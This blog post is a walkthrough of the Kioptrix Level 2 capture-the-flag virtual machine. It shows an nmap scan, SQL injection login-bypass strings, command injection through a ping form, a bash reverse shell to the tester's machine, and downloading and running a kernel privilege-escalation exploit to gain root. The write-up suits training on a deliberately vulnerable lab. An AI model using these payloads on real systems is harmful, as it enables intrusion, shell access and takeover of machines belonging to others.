Sneaker's Stub - The Grey Stuff!

Kioptrix Level 2 Challenge

Kioptrix Level 2 challenge was quite hard compared to the Kioptrix Level 1. we have to have the understanding the web application and should try different ways to finding vulnerability.

Requirements:

  1. Vmware
  2. Kioptrix level 2 challenge
  3. Kali [strictly depends on your choice]

So lets dive in:

-> Nmap 192.168.0.1/24

So my Kioptrix machine has the IP address 192.168.0.108.Lets scan the open ports and find the services running on those.

-> nmap -sV 192.168.0.108

-> nmap -sV -A 192.168.0.108

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-14 10:01 EDT

Nmap scan report for 192.168.0.108

Host is up (0.00026s latency).

Not shown: 994 closed ports

PORT     STATE SERVICE  VERSION

22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)

| ssh-hostkey:

|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)

|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)

|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)

|_sshv1: Server supports SSHv1

80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))

|_http-server-header: Apache/2.0.52 (CentOS)

|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).

111/tcp  open  rpcbind  2 (RPC #100000)

| rpcinfo:

|   program version   port/proto  service

|   100000  2            111/tcp  rpcbind

|   100000  2            111/udp  rpcbind

|   100024  1            677/udp  status

|_  100024  1            680/tcp  status

443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))

|_http-server-header: Apache/2.0.52 (CentOS)

|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).

| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=–

| Not valid before: 2009-10-08T00:10:47

|_Not valid after:  2010-10-08T00:10:47

|_ssl-date: 2017-03-14T10:40:22+00:00; -3h22m16s from scanner time.

| sslv2:

|   SSLv2 supported

|   ciphers:

|     SSL2_RC2_128_CBC_WITH_MD5

|     SSL2_DES_64_CBC_WITH_MD5

|     SSL2_DES_192_EDE3_CBC_WITH_MD5

|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5

|     SSL2_RC4_64_WITH_MD5

|     SSL2_RC4_128_EXPORT40_WITH_MD5

|_    SSL2_RC4_128_WITH_MD5

631/tcp  open  ipp      CUPS 1.1

| http-methods:

|_  Potentially risky methods: PUT

|_http-server-header: CUPS/1.1

|_http-title: 403 Forbidden

3306/tcp open  mysql    MySQL (unauthorized)

MAC Address: 00:0C:29:95:15:33 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 – 2.6.30

Network Distance: 1 hop

 

TRACEROUTE

HOP RTT     ADDRESS

1   0.26 ms 192.168.0.108

 

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 57.85 seconds

So the very first thing I taught of after trying all this is to find any exploitable version. CUP 1.1 have PUT method allowed and I tried to poke around it…I got nothing. The next thing I did is see the website running on port 80.Looks like that:

As you can see in the screenshot I tried SQL Injection on the username and password. In my case ‘–‘ these comment doesnot work with the username but ‘#’ works and also SQL injection:

-> ‘or’a’=’a

works like a charm.

username: ‘or’a’=’a

password: ‘or’a’=’a

or 

username: admin’ #

password: *blank*

 

-> Try pinging some IP and see the response. Here PHP Code Injection could occur. We can directly inject the OS commands in a stacked manner and see the output. && , ;  can help us stack commands, | is called pipe and is used when we need to feed the output of one command to the input of the other but for now it is not required.

 

-> We can try out commands such as

whoami

uname

hostname

cat /etc/passwd

lsb_release

uname -r

-> for now lets try to open an interactive bash and connect it to our machine for better view. Write the following command on the ping input box and before doing that open a listener on your machine on any port [in my case its 4444]

->Listen on kali:

->192.168.0.1 && bash -i >& /dev/tcp/192.168.0.106/4444 0>&1

192.168.0.106 is my kali machine and a netcat is listening on that machine

Once you submit this, the page that opens up stays busy and we will be notify by netcat that we got the bash

Now this command shell is no different from the one we have been using on the web but it got a better view. If you write the command whoami, you will get a response apache that simply means that we are not root and we had the limitations of a apache user. So to get over this we need to find a vulnerability in the system internally or through any port to get our privilege escalated. So after looking around a bit, I checked the kernel version 

A little search on kernel 2.6.9 will give you exploit:

Lets download this exploit but we are not allowed to write any directory other then tmp. So lets download the exploit at /tmp/ directory and run it from there.

->wget -O /tmp/shell.c https://www.exploit-db.com/download/9542 –no-check-certificate

-> to compile the file: gcc /tmp/shell.c -0 /tmp/run

->/tmp/run

After running the exploit, we got the root access and we can check it via typing whoami command.

I changed the root password so now I could login to kioptrix and make changes that I want.

That’s how I got the root access to the Kioptrix Level 2 Challenge.

 

 

 



Leave a Reply